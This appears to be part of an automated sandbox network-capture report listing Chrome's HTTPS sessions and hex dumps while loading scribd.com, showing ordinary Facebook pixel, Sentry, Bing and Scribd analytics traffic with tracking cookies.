                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC1500INData Raw: 65 6e 67 74 68 3e 30 3b 66 3d 6e 2e 6c 65 6e 67 74 68 3e 30 3b 69 66 28 6b 7c 7c 66 29 7b 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 4d 61 72 6b 28 22 66 62 65 76 65 6e 74 73 3a 65 6e 64 3a 75 6e 77 61 6e 74 65 64 44 61 74 61 50 72 6f 63 65 73 73 69 6e 67 22 2c 62 2e 69 64 29 3b 67 2e 6c 6f 67 55 73 65 72 45 72 72 6f 72 28 7b 74 79 70 65 3a 22 55 4e 57 41 4e 54 45 44 5f 43 55 53 54 4f 4d 5f 44 41 54 41 22 7d 29 3b 70 3d 7b 7d 3b 6b 26 26 28 70 2e 75 70 3d 6d 2e 6a 6f 69 6e 28 22 2c 22 29 29 3b 66 26 26 28 70 2e 72 70 3d 6e 2e 6a 6f 69 6e 28 22 2c 22 29 29 3b 72 65 74 75 72 6e 20 70 7d 7d 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 4d 61 72 6b 28 22 66 62 65 76 65 6e 74 73 3a 65 6e 64 3a 75 6e 77 61 6e 74 65 64 44 61 74 61 50 72 6f 63 65 73 73 69 6e 67 22 2c 62 2e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ength>0;f=n.length>0;if(k||f){a.performanceMark("fbevents:end:unwantedDataProcessing",b.id);g.logUserError({type:"UNWANTED_CUSTOM_DATA"});p={};k&&(p.up=m.join(","));f&&(p.rp=n.join(","));return p}}a.performanceMark("fbevents:end:unwantedDataProcessing",b.
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC14884INData Raw: 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 77 61 6e 74 65 64 64 61 74 61 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 77 61 6e 74 65 64 64 61 74 61 22 2c 65 2e 65 78 70 6f 72 74 73 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 77 61 6e 74 65 64 64 61 74 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: xports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.unwanteddata");f.registerPlugin&&f.registerPlugin("fbevents.plugins.unwanteddata",e.exports);f.ensureModuleRegistered("fbevents.plugins.unwanteddata",function(){return e.exports}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC1500INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 48 28 62 2c 63 2c 64 2c 66 29 7b 76 61 72 20 67 3d 49 5b 62 2e 69 64 5d 3b 64 2e 63 73 5f 65 73 74 3d 21 30 3b 69 66 28 67 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 6e 28 67 2c 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 72 79 7b 69 66 28 74 2e 69 73 4d 61 74 63 68 45 53 54 52 75 6c 65 28 67 2e 63 6f 6e 64 69 74 69 6f 6e 2c 63 29 29 7b 69 66 28 67 2e 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 6e 28 67 2e 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 73 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 69 66 28 63 21 3d 3d 70 2e 44 45 52 49 56 45 5f 45 56 45 4e 54 29 72 65 74 75 72 6e 3b 63 3d 61 28 7b 7d 2c 64 29 3b 76 61 72 20 68 3d 7b 65 76 65 6e 74 49 44 3a 66 7d 3b 67 2e 72 75 6c 65 5f 69 64
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: e}function H(b,c,d,f){var g=I[b.id];d.cs_est=!0;if(g==null)return;n(g,function(g){try{if(t.isMatchESTRule(g.condition,c)){if(g.transformations==null)return;n(g.transformations,function(c){if(c!==p.DERIVE_EVENT)return;c=a({},d);var h={eventID:f};g.rule_id
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC14884INData Raw: 6e 64 3a 65 73 74 50 61 67 65 56 69 65 77 50 72 6f 63 65 73 73 69 6e 67 22 29 3b 72 65 74 75 72 6e 7b 63 73 5f 65 73 74 3a 21 30 2c 65 73 74 5f 73 6f 75 72 63 65 3a 69 7d 7d 72 65 74 75 72 6e 7b 7d 7d 29 7d 29 7d 29 28 29 3b 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 65 73 74 72 75 6c 65 65 6e 67 69 6e 65 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 65 73 74 72 75 6c 65 65 6e 67 69 6e 65 22 2c 65 2e 65 78 70 6f 72 74 73 29 3b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: nd:estPageViewProcessing");return{cs_est:!0,est_source:i}}return{}})})})();return e.exports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.estruleengine");f.registerPlugin&&f.registerPlugin("fbevents.plugins.estruleengine",e.exports);
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC1879INData Raw: 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 21 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 62 29 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 62 5d 3d 61 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Modules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!f.__fbeventsModules[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded(b)||(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("SignalsFBEvents.plugi


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        127192.168.2.1649868151.101.194.2174436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC576OUTGET /7.19.0/rewriteframes.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: browser.sentry-cdn.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC545INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 2316
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Wed, 03 Dec 2025 19:25:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 10 Nov 2022 15:50:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: W/"53c740a2171f2626aa4596a10cf7411e"
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        X-GUploader-Response-Body-Transformations: gunzipped
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 268461
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Server: Fastly
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1379INData Raw: 2f 2a 21 20 40 73 65 6e 74 72 79 2f 69 6e 74 65 67 72 61 74 69 6f 6e 73 20 37 2e 31 39 2e 30 20 28 31 38 31 38 34 38 33 29 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 65 74 73 65 6e 74 72 79 2f 73 65 6e 74 72 79 2d 6a 61 76 61 73 63 72 69 70 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 3d 7b 7d 3b 63 6f 6e 73 74 20 6e 3d 2f 5e 28 5c 2f 3f 7c 29 28 5b 5c 73 5c 53 5d 2a 3f 29 28 28 3f 3a 5c 2e 7b 31 2c 32 7d 7c 5b 5e 2f 5d 2b 3f 7c 29 28 5c 2e 5b 5e 2e 2f 5d 2a 7c 29 29 28 3f 3a 5b 2f 5d 2a 29 24 2f 3b 66 75 6e 63 74 69 6f 6e 20 65 28 2e 2e 2e 74 29 7b 6c 65 74 20 72 3d 22 22 2c 6e 3d 21 31 3b 66 6f 72 28 6c 65 74 20 65 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 65 3e 3d 2d 31 26 26 21 6e 3b 65 2d 2d 29 7b 63 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /*! @sentry/integrations 7.19.0 (1818483) | https://github.com/getsentry/sentry-javascript */!function(t){var r={};const n=/^(\/?|)([\s\S]*?)((?:\.{1,2}|[^/]+?|)(\.[^./]*|))(?:[/]*)$/;function e(...t){let r="",n=!1;for(let e=t.length-1;e>=-1&&!n;e--){con
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC937INData Raw: 5c 2f 2e 74 65 73 74 28 74 2e 66 69 6c 65 6e 61 6d 65 29 2c 6e 3d 2f 5e 5c 2f 2f 2e 74 65 73 74 28 74 2e 66 69 6c 65 6e 61 6d 65 29 3b 69 66 28 72 7c 7c 6e 29 7b 63 6f 6e 73 74 20 6e 3d 72 3f 74 2e 66 69 6c 65 6e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 5e 5b 41 2d 5a 5d 3a 2f 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 5c 2f 67 2c 22 2f 22 29 3a 74 2e 66 69 6c 65 6e 61 6d 65 2c 63 3d 74 68 69 73 2e 69 3f 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 74 3d 65 28 74 29 2e 73 75 62 73 74 72 28 31 29 2c 72 3d 65 28 72 29 2e 73 75 62 73 74 72 28 31 29 3b 63 6f 6e 73 74 20 6e 3d 69 28 74 2e 73 70 6c 69 74 28 22 2f 22 29 29 2c 73 3d 69 28 72 2e 73 70 6c 69 74 28 22 2f 22 29 29 2c 63 3d 4d 61 74 68 2e 6d 69 6e 28 6e 2e 6c 65 6e 67 74 68 2c 73 2e 6c 65 6e 67 74 68 29
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: \/.test(t.filename),n=/^\//.test(t.filename);if(r||n){const n=r?t.filename.replace(/^[A-Z]:/,"").replace(/\\/g,"/"):t.filename,c=this.i?function(t,r){t=e(t).substr(1),r=e(r).substr(1);const n=i(t.split("/")),s=i(r.split("/")),c=Math.min(n.length,s.length)


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        128192.168.2.1649867150.171.27.104436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC530OUTGET /p/action/15260218.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: bat.bing.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC572INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: private,max-age=1800
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 364
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                                        X-MSEdge-Ref: Ref A: 906442AC90154A489EBAF6D485B15341 Ref B: EWR311000108019 Ref C: 2024-12-06T21:59:41Z
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC364INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 63 2c 6b 2c 61 2c 62 2c 74 2c 65 29 20 7b 0a 20 20 20 20 76 61 72 20 63 73 20 3d 20 64 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 0a 20 20 20 20 69 66 20 28 63 73 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 75 6f 20 3d 20 63 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 75 65 74 6f 27 29 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 75 6f 20 26 26 20 77 5b 75 6f 5d 20 26 26 20 74 79 70 65 6f 66 20 77 5b 75 6f 5d 2e 73 65 74 55 73 65 72 53 69 67 6e 61 6c 73 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 5b 75 6f 5d 2e 73 65 74 55 73 65 72 53 69 67 6e 61 6c 73 28 7b 27 65 61 27 3a 20 63 2c 20 27 6b 63 27 3a 20 6b 2c 20 27 61 74 27 3a 20 61 2c 20 27
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (function(w,d,c,k,a,b,t,e) { var cs = d.currentScript; if (cs) { var uo = cs.getAttribute('data-ueto'); if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') { w[uo].setUserSignals({'ea': c, 'kc': k, 'at': a, '


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        129192.168.2.1649871151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC3065OUTPOST /api/v1/events HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1701
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f9 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1701OUTData Raw: 7b 22 64 6f 63 5f 69 64 22 3a 38 30 31 35 31 39 32 39 31 2c 22 65 76 65 6e 74 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 72 76 22 2c 22 76 61 6c 75 65 22 3a 22 7b 5c 22 72 69 5c 22 3a 5c 22 73 62 64 2f 46 62 4e 4b 34 2f 57 6e 69 71 35 30 63 56 2f 6a 47 42 79 53 5a 2f 67 3d 5c 22 2c 5c 22 76 69 5c 22 3a 5c 22 38 64 34 62 33 64 64 31 2d 36 32 38 37 2d 34 35 64 38 2d 62 65 31 65 2d 31 34 37 64 30 39 62 65 63 37 37 38 2e 30 5c 22 7d 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 32 2d 30 36 54 32 31 3a 35 39 3a 33 36 2e 35 31 36 5a 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 72 76 22 2c 22 76 61 6c 75 65 22 3a 22 7b 5c 22 72 69 5c 22 3a 5c 22 73 62 64 2f 36 76 52 55 51 4e 44 36 35 54 6f 61 47 77 42 7a 78 76 67 79 4e 35 67 3d 5c 22 2c 5c 22 76 69 5c 22 3a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"doc_id":801519291,"events":[{"name":"rv","value":"{\"ri\":\"sbd/FbNK4/Wniq50cV/jGBySZ/g=\",\"vi\":\"8d4b3dd1-6287-45d8-be1e-147d09bec778.0\"}","timestamp":"2024-12-06T21:59:36.516Z"},{"name":"rv","value":"{\"ri\":\"sbd/6vRUQND65ToaGwBzxvgyN5g=\",\"vi\":
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 40
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890025-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC40INData Raw: 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 6d 65 73 73 61 67 65 22 3a 22 73 75 63 63 65 73 73 22 7d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"status_code":200,"message":"success"}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        130192.168.2.1649872151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC2809OUTGET /api/v1/events HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f9 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC389INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740066-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
